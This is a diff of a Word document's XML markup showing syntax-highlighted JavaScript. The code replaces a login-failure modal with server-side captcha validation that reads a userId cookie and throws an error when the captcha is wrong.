+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>captchaResult</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>captcha</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>validCache</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>ctx</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>cookies</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>get</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="CE9178"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>'userId'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve">), </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>captcha</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13980,7 +17732,59 @@
                 <w:shd w:val="clear" w:fill="1E1E1E"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
               </w:rPr>
-              <w:t>            </w:t>
+              <w:t>        </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="4EC9B0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>console</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>log</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13993,46 +17797,20 @@
                 <w:shd w:val="clear" w:fill="1E1E1E"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
               </w:rPr>
-              <w:t>modal</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>.</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="DCDCAA"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>show</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>({</w:t>
+              <w:t>captchaResult</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -14063,7 +17841,33 @@
                 <w:shd w:val="clear" w:fill="1E1E1E"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
               </w:rPr>
-              <w:t>                </w:t>
+              <w:t>        </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="C586C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>if</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(!</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -14076,33 +17880,20 @@
                 <w:shd w:val="clear" w:fill="1E1E1E"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
               </w:rPr>
-              <w:t>content:</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="CE9178"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>'登录失败'</w:t>
+              <w:t>captchaResult</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>) {</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -14133,7 +17924,111 @@
                 <w:shd w:val="clear" w:fill="1E1E1E"/>
                 <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
               </w:rPr>
-              <w:t>            });</w:t>
+              <w:t>            </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="C586C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>throw</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="569CD6"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>new</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="4EC9B0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>Error</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="CE9178"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>'验证码错误'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -14146,662 +18041,24 @@
               <w:spacing w:line="285" w:lineRule="atLeast"/>
               <w:jc w:val="left"/>
               <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>            </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="4EC9B0"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>console</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>.</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="DCDCAA"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>log</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="CE9178"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>'登录失败'</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:keepNext w:val="0"/>
-              <w:keepLines w:val="0"/>
-              <w:widowControl/>
-              <w:suppressLineNumbers w:val="0"/>
-              <w:shd w:val="clear" w:fill="1E1E1E"/>
-              <w:spacing w:line="285" w:lineRule="atLeast"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>        }</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:keepNext w:val="0"/>
-              <w:keepLines w:val="0"/>
-              <w:widowControl/>
-              <w:suppressLineNumbers w:val="0"/>
-              <w:shd w:val="clear" w:fill="1E1E1E"/>
-              <w:spacing w:line="285" w:lineRule="atLeast"/>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:vertAlign w:val="baseline"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>    });</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:keepNext w:val="0"/>
-        <w:keepLines w:val="0"/>
-        <w:widowControl/>
-        <w:numPr>
-          <w:numId w:val="0"/>
-        </w:numPr>
-        <w:suppressLineNumbers w:val="0"/>
-        <w:spacing w:before="53" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="1"/>
-        <w:ind w:leftChars="200"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
-      </w:pPr>
-      <w:r>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
-            <wp:extent cx="5269230" cy="1304925"/>
-            <wp:effectExtent l="0" t="0" r="7620" b="9525"/>
-            <wp:docPr id="6" name="图片 6"/>
